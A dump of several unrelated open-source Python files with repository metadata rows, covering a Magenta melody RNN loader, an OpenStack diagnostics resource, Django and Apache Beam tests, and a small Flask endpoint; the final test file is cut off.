Note RNN Loader allows a basic melody prediction LSTM RNN model to be loaded
from a checkpoint file, primed, and used to predict next notes.
This class can be used as the q_network and target_q_network for the RLTuner
class.
The graph structure of this model is similar to basic_rnn, but more flexible.
It allows you to either train it with data from a queue, or just 'call' it to
produce the next action.
It also provides the ability to add the model's graph to an existing graph as a
subcomponent, and then load variables from a checkpoint file into only that
piece of the overall graph.
These functions are necessary for use with the RL Tuner class.
"""
import os
# internal imports
import numpy as np
import tensorflow as tf
import magenta
from magenta.common import sequence_example_lib
from magenta.models.rl_tuner import rl_tuner_ops
from magenta.models.shared import events_rnn_graph
from magenta.music import melodies_lib
from magenta.music import midi_io
from magenta.music import sequences_lib
class NoteRNNLoader(object):
"""Builds graph for a Note RNN and instantiates weights from a checkpoint.
Loads weights from a previously saved checkpoint file corresponding to a pre-
trained basic_rnn model. Has functions that allow it to be primed with a MIDI
melody, and allow it to be called to produce its predictions for the next
note in a sequence.
Used as part of the RLTuner class.
"""
def __init__(self, graph, scope, checkpoint_dir, checkpoint_file=None,
midi_primer=None, training_file_list=None, hparams=None,
note_rnn_type='default', checkpoint_scope='rnn_model'):
"""Initialize by building the graph and loading a previous checkpoint.
Args:
graph: A tensorflow graph where the MelodyRNN's graph will be added.
scope: The tensorflow scope where this network will be saved.
checkpoint_dir: Path to the directory where the checkpoint file is saved.
checkpoint_file: Path to a checkpoint file to be used if none can be
found in the checkpoint_dir
midi_primer: Path to a single midi file that can be used to prime the
model.
training_file_list: List of paths to tfrecord files containing melody
training data.
hparams: A tf_lib.HParams object. Must match the hparams used to create
the checkpoint file.
note_rnn_type: If 'default', will use the basic LSTM described in the
research paper. If 'basic_rnn', will assume the checkpoint is from a
Magenta basic_rnn model.
checkpoint_scope: The scope in lstm which the model was originally defined
when it was first trained.
"""
self.graph = graph
self.session = None
self.scope = scope
self.batch_size = 1
self.midi_primer = midi_primer
self.checkpoint_scope = checkpoint_scope
self.note_rnn_type = note_rnn_type
self.training_file_list = training_file_list
self.checkpoint_dir = checkpoint_dir
self.checkpoint_file = checkpoint_file
if hparams is not None:
tf.logging.info('Using custom hparams')
self.hparams = hparams
else:
tf.logging.info('Empty hparams string. Using defaults')
self.hparams = rl_tuner_ops.default_hparams()
self.build_graph()
self.state_value = self.get_zero_state()
if midi_primer is not None:
self.load_primer()
self.variable_names = rl_tuner_ops.get_variable_names(self.graph,
self.scope)
self.transpose_amount = 0
def get_zero_state(self):
"""Gets an initial state of zeros of the appropriate size.
Required size is based on the model's internal RNN cell.
Returns:
A matrix of batch_size x cell size zeros.
"""
return np.zeros((self.batch_size, self.cell.state_size))
def restore_initialize_prime(self, session):
"""Saves the session, restores variables from checkpoint, primes model.
Model is primed with its default midi file.
Args:
session: A tensorflow session.
"""
self.session = session
self.restore_vars_from_checkpoint(self.checkpoint_dir)
self.prime_model()
def initialize_and_restore(self, session):
"""Saves the session, restores variables from checkpoint.
Args:
session: A tensorflow session.
"""
self.session = session
self.restore_vars_from_checkpoint(self.checkpoint_dir)
def initialize_new(self, session=None):
"""Saves the session, initializes all variables to random values.
Args:
session: A tensorflow session.
"""
with self.graph.as_default():
if session is None:
self.session = tf.Session(graph=self.graph)
else:
self.session = session
self.session.run(tf.initialize_all_variables())
def get_variable_name_dict(self):
"""Constructs a dict mapping the checkpoint variables to those in new graph.
Returns:
A dict mapping variable names in the checkpoint to variables in the graph.
"""
var_dict = dict()
for var in self.variables():
inner_name = rl_tuner_ops.get_inner_scope(var.name)
inner_name = rl_tuner_ops.trim_variable_postfixes(inner_name)
if '/Adam' in var.name:
# TODO(lukaszkaiser): investigate the problem here and remove this hack.
pass
elif self.note_rnn_type == 'basic_rnn':
var_dict[inner_name] = var
else:
var_dict[self.checkpoint_scope + '/' + inner_name] = var
return var_dict
def build_graph(self):
"""Constructs the portion of the graph that belongs to this model."""
tf.logging.info('Initializing melody RNN graph for scope %s', self.scope)
with self.graph.as_default():
with tf.device(lambda op: ''):
with tf.variable_scope(self.scope):
# Make an LSTM cell with the number and size of layers specified in
# hparams.
if self.note_rnn_type == 'basic_rnn':
self.cell = events_rnn_graph.make_rnn_cell(
self.hparams.rnn_layer_sizes)
else:
self.cell = rl_tuner_ops.make_rnn_cell(self.hparams.rnn_layer_sizes)
# Shape of melody_sequence is batch size, melody length, number of
# output note actions.
self.melody_sequence = tf.placeholder(tf.float32,
[None, None,
self.hparams.one_hot_length],
name='melody_sequence')
self.lengths = tf.placeholder(tf.int32, [None], name='lengths')
self.initial_state = tf.placeholder(tf.float32,
[None, self.cell.state_size],
name='initial_state')
if self.training_file_list is not None:
# Set up a tf queue to read melodies from the training data tfrecord
(self.train_sequence,
self.train_labels,
self.train_lengths) = sequence_example_lib.get_padded_batch(
self.training_file_list, self.hparams.batch_size,
self.hparams.one_hot_length)
# Closure function is used so that this part of the graph can be
# re-run in multiple places, such as __call__.
def run_network_on_melody(m_seq,
lens,
initial_state,
swap_memory=True,
parallel_iterations=1):
"""Internal function that defines the RNN network structure.
Args:
m_seq: A batch of melody sequences of one-hot notes.
lens: Lengths of the melody_sequences.
initial_state: Vector representing the initial state of the RNN.
swap_memory: Uses more memory and is faster.
parallel_iterations: Argument to tf.nn.dynamic_rnn.
Returns:
Output of network (either softmax or logits) and RNN state.
"""
outputs, final_state = tf.nn.dynamic_rnn(
self.cell,
m_seq,
sequence_length=lens,
initial_state=initial_state,
swap_memory=swap_memory,
parallel_iterations=parallel_iterations)
outputs_flat = tf.reshape(outputs,
[-1, self.hparams.rnn_layer_sizes[-1]])
linear_layer = (tf.contrib.layers.linear
if self.note_rnn_type == 'basic_rnn'
else tf.contrib.layers.legacy_linear)
logits_flat = linear_layer(
outputs_flat, self.hparams.one_hot_length)
return logits_flat, final_state
(self.logits, self.state_tensor) = run_network_on_melody(
self.melody_sequence, self.lengths, self.initial_state)
self.softmax = tf.nn.softmax(self.logits)
self.run_network_on_melody = run_network_on_melody
if self.training_file_list is not None:
# Does not recreate the model architecture but rather uses it to feed
# data from the training queue through the model.
with tf.variable_scope(self.scope, reuse=True):
zero_state = self.cell.zero_state(
batch_size=self.hparams.batch_size, dtype=tf.float32)
(self.train_logits, self.train_state) = run_network_on_melody(
self.train_sequence, self.train_lengths, zero_state)
self.train_softmax = tf.nn.softmax(self.train_logits)
def restore_vars_from_checkpoint(self, checkpoint_dir):
"""Loads model weights from a saved checkpoint.
Args:
checkpoint_dir: Directory which contains a saved checkpoint of the
model.
"""
tf.logging.info('Restoring variables from checkpoint')
var_dict = self.get_variable_name_dict()
with self.graph.as_default():
saver = tf.train.Saver(var_list=var_dict)
tf.logging.info('Checkpoint dir: %s', checkpoint_dir)
checkpoint_file = tf.train.latest_checkpoint(checkpoint_dir)
if checkpoint_file is None:
tf.logging.warn("Can't find checkpoint file, using %s",
self.checkpoint_file)
checkpoint_file = self.checkpoint_file
tf.logging.info('Checkpoint file: %s', checkpoint_file)
saver.restore(self.session, checkpoint_file)
def load_primer(self):
"""Loads default MIDI primer file.
Also assigns the steps per bar of this file to be the model's defaults.
"""
if not os.path.exists(self.midi_primer):
tf.logging.warn('ERROR! No such primer file exists! %s', self.midi_primer)
return
self.primer_sequence = midi_io.midi_file_to_sequence_proto(self.midi_primer)
quantized_seq = sequences_lib.quantize_note_sequence(
self.primer_sequence, steps_per_quarter=4)
extracted_melodies, _ = melodies_lib.extract_melodies(quantized_seq,
min_bars=0,
min_unique_pitches=1)
self.primer = extracted_melodies[0]
self.steps_per_bar = self.primer.steps_per_bar
def prime_model(self):
"""Primes the model with its default midi primer."""
with self.graph.as_default():
tf.logging.debug('Priming the model with MIDI file %s', self.midi_primer)
# Convert primer Melody to model inputs.
encoder = magenta.music.OneHotEventSequenceEncoderDecoder(
magenta.music.MelodyOneHotEncoding(
min_note=rl_tuner_ops.MIN_NOTE,
max_note=rl_tuner_ops.MAX_NOTE))
seq = encoder.encode(self.primer)
features = seq.feature_lists.feature_list['inputs'].feature
primer_input = [list(i.float_list.value) for i in features]
# Run model over primer sequence.
primer_input_batch = np.tile([primer_input], (self.batch_size, 1, 1))
self.state_value, softmax = self.session.run(
[self.state_tensor, self.softmax],
feed_dict={self.initial_state: self.state_value,
self.melody_sequence: primer_input_batch,
self.lengths: np.full(self.batch_size,
len(self.primer),
dtype=int)})
priming_output = softmax[-1, :]
self.priming_note = self.get_note_from_softmax(priming_output)
def get_note_from_softmax(self, softmax):
"""Extracts a one-hot encoding of the most probable note.
Args:
softmax: Softmax probabilities over possible next notes.
Returns:
One-hot encoding of most probable note.
"""
note_idx = np.argmax(softmax)
note_enc = rl_tuner_ops.make_onehot([note_idx], rl_tuner_ops.NUM_CLASSES)
return np.reshape(note_enc, (rl_tuner_ops.NUM_CLASSES))
def __call__(self):
"""Allows the network to be called, as in the following code snippet!
q_network = MelodyRNN(...)
q_network()
The q_network() operation can then be placed into a larger graph as a tf op.
Note that to get actual values from call, must do session.run and feed in
melody_sequence, lengths, and initial_state in the feed dict.
Returns:
Either softmax probabilities over notes, or raw logit scores.
"""
with self.graph.as_default():
with tf.variable_scope(self.scope, reuse=True):
logits, self.state_tensor = self.run_network_on_melody(
self.melody_sequence, self.lengths, self.initial_state)
return logits
def run_training_batch(self):
"""Runs one batch of training data through the model.
Uses a queue runner to pull one batch of data from the training files
and run it through the model.
Returns:
A batch of softmax probabilities and model state vectors.
"""
if self.training_file_list is None:
tf.logging.warn('No training file path was provided, cannot run training'
'batch')
return
coord = tf.train.Coordinator()
tf.train.start_queue_runners(sess=self.session, coord=coord)
softmax, state, lengths = self.session.run([self.train_softmax,
self.train_state,
self.train_lengths])
coord.request_stop()
return softmax, state, lengths
def get_next_note_from_note(self, note):
"""Given a note, uses the model to predict the most probable next note.
Args:
note: A one-hot encoding of the note.
Returns:
Next note in the same format.
"""
with self.graph.as_default():
with tf.variable_scope(self.scope, reuse=True):
singleton_lengths = np.full(self.batch_size, 1, dtype=int)
input_batch = np.reshape(note,
(self.batch_size, 1, rl_tuner_ops.NUM_CLASSES))
softmax, self.state_value = self.session.run(
[self.softmax, self.state_tensor],
{self.melody_sequence: input_batch,
self.initial_state: self.state_value,
self.lengths: singleton_lengths})
return self.get_note_from_softmax(softmax)
def variables(self):
"""Gets names of all the variables in the graph belonging to this model.
Returns:
List of variable names.
"""
with self.graph.as_default():
return [v for v in tf.all_variables() if v.name.startswith(self.scope)]
| 38.467933
| 80
| 0.656314
|
24a8501ada933104d79b8353d10158cd47023268
| 2,085
|
py
|
Python
|
openstack/compute/v2/server_diagnostics.py
|
NeCTAR-RC/openstacksdk
|
60a24f6c4717a1f9a0e545c9a07e68afaedc5a27
|
[
"Apache-2.0"
] | 99
|
2018-03-28T15:41:45.000Z
|
2022-01-23T17:22:13.000Z
|
openstack/compute/v2/server_diagnostics.py
|
NeCTAR-RC/openstacksdk
|
60a24f6c4717a1f9a0e545c9a07e68afaedc5a27
|
[
"Apache-2.0"
] | 5
|
2018-05-25T16:54:23.000Z
|
2021-11-21T02:27:16.000Z
|
openstack/compute/v2/server_diagnostics.py
|
NeCTAR-RC/openstacksdk
|
60a24f6c4717a1f9a0e545c9a07e68afaedc5a27
|
[
"Apache-2.0"
] | 104
|
2018-04-06T14:33:54.000Z
|
2022-03-01T01:58:09.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack import resource
class ServerDiagnostics(resource.Resource):
resource_key = 'diagnostics'
base_path = '/servers/%(server_id)s/diagnostics'
# capabilities
allow_fetch = True
requires_id = False
#: Indicates whether or not a config drive was used for this server.
has_config_drive = resource.Body('config_drive')
#: The current state of the VM.
state = resource.Body('state')
#: The driver on which the VM is running.
driver = resource.Body('driver')
#: The hypervisor on which the VM is running.
hypervisor = resource.Body('hypervisor')
#: The hypervisor OS.
hypervisor_os = resource.Body('hypervisor_os')
#: The amount of time in seconds that the VM has been running.
uptime = resource.URI('uptime')
#: The number of vCPUs.
num_cpus = resource.URI('num_cpus')
#: The number of disks.
num_disks = resource.URI('num_disks')
#: The number of vNICs.
num_nics = resource.URI('num_nics')
#: The dictionary with information about VM memory usage.
memory_details = resource.URI('memory_details')
#: The list of dictionaries with detailed information about VM CPUs.
cpu_details = resource.URI('cpu_details')
#: The list of dictionaries with detailed information about VM disks.
disk_details = resource.URI('disk_details')
#: The list of dictionaries with detailed information about VM NICs.
nic_details = resource.URI('nic_details')
#: The ID for the server.
server_id = resource.URI('server_id')
| 39.339623
| 75
| 0.716067
|
3ec2f6763150555ec93e7b60b2f171cc50d2b4cd
| 2,167
|
py
|
Python
|
example/tests/test_performance.py
|
morenoh149/django-rest-framework-json-api
|
aea98ccc4f7bb9bad25d43d5631641b3671de53b
|
[
"BSD-2-Clause"
] | null | null | null |
example/tests/test_performance.py
|
morenoh149/django-rest-framework-json-api
|
aea98ccc4f7bb9bad25d43d5631641b3671de53b
|
[
"BSD-2-Clause"
] | null | null | null |
example/tests/test_performance.py
|
morenoh149/django-rest-framework-json-api
|
aea98ccc4f7bb9bad25d43d5631641b3671de53b
|
[
"BSD-2-Clause"
] | 2
|
2019-05-15T12:04:16.000Z
|
2019-05-21T09:37:38.000Z
|
from django.utils import timezone
from rest_framework.test import APITestCase
from example.factories import CommentFactory
from example.models import Author, Blog, Comment, Entry
class PerformanceTestCase(APITestCase):
def setUp(self):
self.author = Author.objects.create(name='Super powerful superhero', email='i.am@lost.com')
self.blog = Blog.objects.create(name='Some Blog', tagline="It's a blog")
self.other_blog = Blog.objects.create(name='Other blog', tagline="It's another blog")
self.first_entry = Entry.objects.create(
blog=self.blog,
headline='headline one',
body_text='body_text two',
pub_date=timezone.now(),
mod_date=timezone.now(),
n_comments=0,
n_pingbacks=0,
rating=3
)
self.second_entry = Entry.objects.create(
blog=self.blog,
headline='headline two',
body_text='body_text one',
pub_date=timezone.now(),
mod_date=timezone.now(),
n_comments=0,
n_pingbacks=0,
rating=1
)
self.comment = Comment.objects.create(entry=self.first_entry)
CommentFactory.create_batch(50)
def test_query_count_no_includes(self):
""" We expect a simple list view to issue only two queries.
1. The number of results in the set (e.g. a COUNT query),
only necessary because we're using PageNumberPagination
2. The SELECT query for the set
"""
with self.assertNumQueries(2):
response = self.client.get('/comments?page_size=25')
self.assertEqual(len(response.data['results']), 25)
def test_query_count_include_author(self):
""" We expect a list view with an include have three queries:
1. Primary resource COUNT query
2. Primary resource SELECT
3. Authors prefetched
3. Entries prefetched
"""
with self.assertNumQueries(4):
response = self.client.get('/comments?include=author&page_size=25')
self.assertEqual(len(response.data['results']), 25)
| 37.362069
| 99
| 0.624827
|
7cb3823a5a44579c9b4f754a8e29cc336df1a879
| 157
|
py
|
Python
|
spladder/__init__.py
|
ratschlab/spladder
|
8175c054a9b8fe7ae509f34fe5fb4d90a8cbe151
|
[
"BSD-3-Clause"
] | 96
|
2015-03-27T01:06:09.000Z
|
2022-03-20T05:56:54.000Z
|
spladder/__init__.py
|
ratschlab/spladder
|
8175c054a9b8fe7ae509f34fe5fb4d90a8cbe151
|
[
"BSD-3-Clause"
] | 160
|
2015-01-20T20:45:48.000Z
|
2022-03-31T14:48:05.000Z
|
spladder/__init__.py
|
ratschlab/spladder
|
8175c054a9b8fe7ae509f34fe5fb4d90a8cbe151
|
[
"BSD-3-Clause"
] | 42
|
2015-03-27T20:49:15.000Z
|
2021-12-21T12:39:42.000Z
|
# -*- coding: utf-8 -*-
"""Top-level package for spladder."""
__author__ = """Andre Kahles"""
__email__ = 'andre.kahles@inf.ethz.ch'
__version__ = '2.4.4'
| 19.625
| 38
| 0.636943
|
a87bf86f38b9e0fb3529ea16a67b83d398ec10d7
| 1,117
|
py
|
Python
|
api/waitlist/xup_history.py
|
AdoEditor/tdf-waitlist
|
9ed20497c23a2d70ffa90819d01358828c35a55e
|
[
"MIT"
] | null | null | null |
api/waitlist/xup_history.py
|
AdoEditor/tdf-waitlist
|
9ed20497c23a2d70ffa90819d01358828c35a55e
|
[
"MIT"
] | null | null | null |
api/waitlist/xup_history.py
|
AdoEditor/tdf-waitlist
|
9ed20497c23a2d70ffa90819d01358828c35a55e
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, g
from . import auth
from .webutil import ViewReturn
from .data.database import FitHistory, Fitting, ImplantSet
from .data.evedb import name_of
bp = Blueprint("xup_history", __name__)
@bp.route("/api/history/xup")
@auth.login_required
@auth.select_character(override_permission="fit-history-view")
def get_xup_history() -> ViewReturn:
xups = []
for history_line, fitting, implant_set in (
g.db.query(FitHistory, Fitting, ImplantSet)
.join(FitHistory.fit)
.join(FitHistory.implant_set)
.filter(FitHistory.character_id == g.character_id)
.order_by(FitHistory.id.desc())
):
xups.append(
{
"logged_at": history_line.logged_at,
"dna": fitting.dna,
"implants": list(
map(int, filter(lambda x: x, implant_set.implants.split(":")))
),
"hull": {
"id": fitting.hull,
"name": name_of(fitting.hull),
},
}
)
return {
"xups": xups,
}
| 28.641026
| 82
| 0.566697
|
f4c51804368cebee872b808f6237eca9c94a8edd
| 18,454
|
py
|
Python
|
sdks/python/apache_beam/coders/coders_test_common.py
|
charithe/beam
|
f085cb500730cf0c67c467ac55f92b3c59f52b39
|
[
"Apache-2.0"
] | 2
|
2020-06-25T00:47:43.000Z
|
2020-08-24T14:25:13.000Z
|
sdks/python/apache_beam/coders/coders_test_common.py
|
charithe/beam
|
f085cb500730cf0c67c467ac55f92b3c59f52b39
|
[
"Apache-2.0"
] | 10
|
2017-07-20T13:38:13.000Z
|
2017-08-03T15:49:24.000Z
|
sdks/python/apache_beam/coders/coders_test_common.py
|
charithe/beam
|
f085cb500730cf0c67c467ac55f92b3c59f52b39
|
[
"Apache-2.0"
] | 2
|
2020-06-22T11:17:44.000Z
|
2020-11-04T04:11:59.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests common to all coder implementations."""
from __future__ import absolute_import
import logging
import math
import sys
import unittest
from builtins import range
from apache_beam.coders import proto2_coder_test_messages_pb2 as test_message
from apache_beam.coders import coders
from apache_beam.internal import pickler
from apache_beam.runners import pipeline_context
from apache_beam.transforms import window
from apache_beam.transforms.window import GlobalWindow
from apache_beam.utils import timestamp
from apache_beam.utils import windowed_value
from apache_beam.utils.timestamp import MIN_TIMESTAMP
from . import observable
# Defined out of line for picklability.
class CustomCoder(coders.Coder):
def encode(self, x):
return str(x+1).encode('utf-8')
def decode(self, encoded):
return int(encoded) - 1
class CodersTest(unittest.TestCase):
# These class methods ensure that we test each defined coder in both
# nested and unnested context.
@classmethod
def setUpClass(cls):
cls.seen = set()
cls.seen_nested = set()
# Method has been renamed in Python 3
if sys.version_info[0] < 3:
cls.assertCountEqual = cls.assertItemsEqual
@classmethod
def tearDownClass(cls):
standard = set(c
for c in coders.__dict__.values()
if isinstance(c, type) and issubclass(c, coders.Coder) and
'Base' not in c.__name__)
standard -= set([coders.Coder,
coders.AvroCoder,
coders.DeterministicProtoCoder,
coders.FastCoder,
coders.ProtoCoder,
coders.RunnerAPICoderHolder,
coders.ToStringCoder])
assert not standard - cls.seen, standard - cls.seen
assert not standard - cls.seen_nested, standard - cls.seen_nested
@classmethod
def _observe(cls, coder):
cls.seen.add(type(coder))
cls._observe_nested(coder)
@classmethod
def _observe_nested(cls, coder):
if isinstance(coder, coders.TupleCoder):
for c in coder.coders():
cls.seen_nested.add(type(c))
cls._observe_nested(c)
def check_coder(self, coder, *values, **kwargs):
context = kwargs.pop('context', pipeline_context.PipelineContext())
test_size_estimation = kwargs.pop('test_size_estimation', True)
assert not kwargs
self._observe(coder)
for v in values:
self.assertEqual(v, coder.decode(coder.encode(v)))
if test_size_estimation:
self.assertEqual(coder.estimate_size(v),
len(coder.encode(v)))
self.assertEqual(coder.estimate_size(v),
coder.get_impl().estimate_size(v))
self.assertEqual(coder.get_impl().get_estimated_size_and_observables(v),
(coder.get_impl().estimate_size(v), []))
copy1 = pickler.loads(pickler.dumps(coder))
copy2 = coders.Coder.from_runner_api(coder.to_runner_api(context), context)
for v in values:
self.assertEqual(v, copy1.decode(copy2.encode(v)))
if coder.is_deterministic():
self.assertEqual(copy1.encode(v), copy2.encode(v))
def test_custom_coder(self):
self.check_coder(CustomCoder(), 1, -10, 5)
self.check_coder(coders.TupleCoder((CustomCoder(), coders.BytesCoder())),
(1, b'a'), (-10, b'b'), (5, b'c'))
def test_pickle_coder(self):
self.check_coder(coders.PickleCoder(), 'a', 1, 1.5, (1, 2, 3))
def test_deterministic_coder(self):
coder = coders.FastPrimitivesCoder()
deterministic_coder = coders.DeterministicFastPrimitivesCoder(coder, 'step')
self.check_coder(deterministic_coder, 'a', 1, 1.5, (1, 2, 3))
with self.assertRaises(TypeError):
self.check_coder(deterministic_coder, dict())
with self.assertRaises(TypeError):
self.check_coder(deterministic_coder, [1, dict()])
self.check_coder(coders.TupleCoder((deterministic_coder, coder)),
(1, dict()), ('a', [dict()]))
def test_dill_coder(self):
cell_value = (lambda x: lambda: x)(0).__closure__[0]
self.check_coder(coders.DillCoder(), 'a', 1, cell_value)
self.check_coder(
coders.TupleCoder((coders.VarIntCoder(), coders.DillCoder())),
(1, cell_value))
def test_fast_primitives_coder(self):
coder = coders.FastPrimitivesCoder(coders.SingletonCoder(len))
self.check_coder(coder, None, 1, -1, 1.5, b'str\0str', u'unicode\0\u0101')
self.check_coder(coder, (), (1, 2, 3))
self.check_coder(coder, [], [1, 2, 3])
self.check_coder(coder, dict(), {'a': 'b'}, {0: dict(), 1: len})
self.check_coder(coder, set(), {'a', 'b'})
self.check_coder(coder, True, False)
self.check_coder(coder, len)
self.check_coder(coders.TupleCoder((coder,)), ('a',), (1,))
def test_fast_primitives_coder_large_int(self):
coder = coders.FastPrimitivesCoder()
self.check_coder(coder, 10 ** 100)
def test_bytes_coder(self):
self.check_coder(coders.BytesCoder(), b'a', b'\0', b'z' * 1000)
def test_varint_coder(self):
# Small ints.
self.check_coder(coders.VarIntCoder(), *range(-10, 10))
# Multi-byte encoding starts at 128
self.check_coder(coders.VarIntCoder(), *range(120, 140))
# Large values
MAX_64_BIT_INT = 0x7fffffffffffffff
self.check_coder(coders.VarIntCoder(),
*[int(math.pow(-1, k) * math.exp(k))
for k in range(0, int(math.log(MAX_64_BIT_INT)))])
def test_float_coder(self):
self.check_coder(coders.FloatCoder(),
*[float(0.1 * x) for x in range(-100, 100)])
self.check_coder(coders.FloatCoder(),
*[float(2 ** (0.1 * x)) for x in range(-100, 100)])
self.check_coder(coders.FloatCoder(), float('-Inf'), float('Inf'))
self.check_coder(
coders.TupleCoder((coders.FloatCoder(), coders.FloatCoder())),
(0, 1), (-100, 100), (0.5, 0.25))
def test_singleton_coder(self):
a = 'anything'
b = 'something else'
self.check_coder(coders.SingletonCoder(a), a)
self.check_coder(coders.SingletonCoder(b), b)
self.check_coder(coders.TupleCoder((coders.SingletonCoder(a),
coders.SingletonCoder(b))), (a, b))
def test_interval_window_coder(self):
self.check_coder(coders.IntervalWindowCoder(),
*[window.IntervalWindow(x, y)
for x in [-2**52, 0, 2**52]
for y in range(-100, 100)])
self.check_coder(
coders.TupleCoder((coders.IntervalWindowCoder(),)),
(window.IntervalWindow(0, 10),))
def test_timestamp_coder(self):
self.check_coder(coders.TimestampCoder(),
*[timestamp.Timestamp(micros=x) for x in (-1000, 0, 1000)])
self.check_coder(coders.TimestampCoder(),
timestamp.Timestamp(micros=-1234567000),
timestamp.Timestamp(micros=1234567000))
self.check_coder(coders.TimestampCoder(),
timestamp.Timestamp(micros=-1234567890123456000),
timestamp.Timestamp(micros=1234567890123456000))
self.check_coder(
coders.TupleCoder((coders.TimestampCoder(), coders.BytesCoder())),
(timestamp.Timestamp.of(27), b'abc'))
def test_timer_coder(self):
self.check_coder(coders._TimerCoder(coders.BytesCoder()),
*[{'timestamp': timestamp.Timestamp(micros=x),
'payload': b'xyz'}
for x in (-3000, 0, 3000)])
self.check_coder(
coders.TupleCoder((coders._TimerCoder(coders.VarIntCoder()),)),
({'timestamp': timestamp.Timestamp.of(37000), 'payload': 389},))
def test_tuple_coder(self):
kv_coder = coders.TupleCoder((coders.VarIntCoder(), coders.BytesCoder()))
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:pair',
'is_pair_like': True,
'component_encodings': [
coders.VarIntCoder().as_cloud_object(),
coders.BytesCoder().as_cloud_object()],
},
kv_coder.as_cloud_object())
# Test binary representation
self.assertEqual(
b'\x04abc',
kv_coder.encode((4, b'abc')))
# Test unnested
self.check_coder(
kv_coder,
(1, b'a'),
(-2, b'a' * 100),
(300, b'abc\0' * 5))
# Test nested
self.check_coder(
coders.TupleCoder(
(coders.TupleCoder((coders.PickleCoder(), coders.VarIntCoder())),
coders.StrUtf8Coder())),
((1, 2), 'a'),
((-2, 5), u'a\u0101' * 100),
((300, 1), 'abc\0' * 5))
def test_tuple_sequence_coder(self):
int_tuple_coder = coders.TupleSequenceCoder(coders.VarIntCoder())
self.check_coder(int_tuple_coder, (1, -1, 0), (), tuple(range(1000)))
self.check_coder(
coders.TupleCoder((coders.VarIntCoder(), int_tuple_coder)),
(1, (1, 2, 3)))
def test_base64_pickle_coder(self):
self.check_coder(coders.Base64PickleCoder(), 'a', 1, 1.5, (1, 2, 3))
def test_utf8_coder(self):
self.check_coder(coders.StrUtf8Coder(), 'a', u'ab\u00FF', u'\u0101\0')
def test_iterable_coder(self):
iterable_coder = coders.IterableCoder(coders.VarIntCoder())
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:stream',
'is_stream_like': True,
'component_encodings': [coders.VarIntCoder().as_cloud_object()]
},
iterable_coder.as_cloud_object())
# Test unnested
self.check_coder(iterable_coder,
[1], [-1, 0, 100])
# Test nested
self.check_coder(
coders.TupleCoder((coders.VarIntCoder(),
coders.IterableCoder(coders.VarIntCoder()))),
(1, [1, 2, 3]))
def test_iterable_coder_unknown_length(self):
# Empty
self._test_iterable_coder_of_unknown_length(0)
# Single element
self._test_iterable_coder_of_unknown_length(1)
# Multiple elements
self._test_iterable_coder_of_unknown_length(100)
# Multiple elements with underlying stream buffer overflow.
self._test_iterable_coder_of_unknown_length(80000)
def _test_iterable_coder_of_unknown_length(self, count):
def iter_generator(count):
for i in range(count):
yield i
iterable_coder = coders.IterableCoder(coders.VarIntCoder())
self.assertCountEqual(list(iter_generator(count)),
iterable_coder.decode(
iterable_coder.encode(iter_generator(count))))
def test_windowedvalue_coder_paneinfo(self):
coder = coders.WindowedValueCoder(coders.VarIntCoder(),
coders.GlobalWindowCoder())
test_paneinfo_values = [
windowed_value.PANE_INFO_UNKNOWN,
windowed_value.PaneInfo(
True, True, windowed_value.PaneInfoTiming.EARLY, 0, -1),
windowed_value.PaneInfo(
True, False, windowed_value.PaneInfoTiming.ON_TIME, 0, 0),
windowed_value.PaneInfo(
True, False, windowed_value.PaneInfoTiming.ON_TIME, 10, 0),
windowed_value.PaneInfo(
False, True, windowed_value.PaneInfoTiming.ON_TIME, 0, 23),
windowed_value.PaneInfo(
False, True, windowed_value.PaneInfoTiming.ON_TIME, 12, 23),
windowed_value.PaneInfo(
False, False, windowed_value.PaneInfoTiming.LATE, 0, 123),]
test_values = [windowed_value.WindowedValue(123, 234, (GlobalWindow(),), p)
for p in test_paneinfo_values]
# Test unnested.
self.check_coder(coder, windowed_value.WindowedValue(
123, 234, (GlobalWindow(),), windowed_value.PANE_INFO_UNKNOWN))
for value in test_values:
self.check_coder(coder, value)
# Test nested.
for value1 in test_values:
for value2 in test_values:
self.check_coder(coders.TupleCoder((coder, coder)), (value1, value2))
def test_windowed_value_coder(self):
coder = coders.WindowedValueCoder(coders.VarIntCoder(),
coders.GlobalWindowCoder())
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:windowed_value',
'is_wrapper': True,
'component_encodings': [
coders.VarIntCoder().as_cloud_object(),
coders.GlobalWindowCoder().as_cloud_object(),
],
},
coder.as_cloud_object())
# Test binary representation
self.assertEqual(b'\x7f\xdf;dZ\x1c\xac\t\x00\x00\x00\x01\x0f\x01',
coder.encode(window.GlobalWindows.windowed_value(1)))
# Test decoding large timestamp
self.assertEqual(
coder.decode(b'\x7f\xdf;dZ\x1c\xac\x08\x00\x00\x00\x01\x0f\x00'),
windowed_value.create(0, MIN_TIMESTAMP.micros, (GlobalWindow(),)))
# Test unnested
self.check_coder(
coders.WindowedValueCoder(coders.VarIntCoder()),
windowed_value.WindowedValue(3, -100, ()),
windowed_value.WindowedValue(-1, 100, (1, 2, 3)))
# Test Global Window
self.check_coder(
coders.WindowedValueCoder(coders.VarIntCoder(),
coders.GlobalWindowCoder()),
window.GlobalWindows.windowed_value(1))
# Test nested
self.check_coder(
coders.TupleCoder((
coders.WindowedValueCoder(coders.FloatCoder()),
coders.WindowedValueCoder(coders.StrUtf8Coder()))),
(windowed_value.WindowedValue(1.5, 0, ()),
windowed_value.WindowedValue("abc", 10, ('window',))))
def test_proto_coder(self):
# For instructions on how these test proto message were generated,
# see coders_test.py
ma = test_message.MessageA()
mab = ma.field2.add()
mab.field1 = True
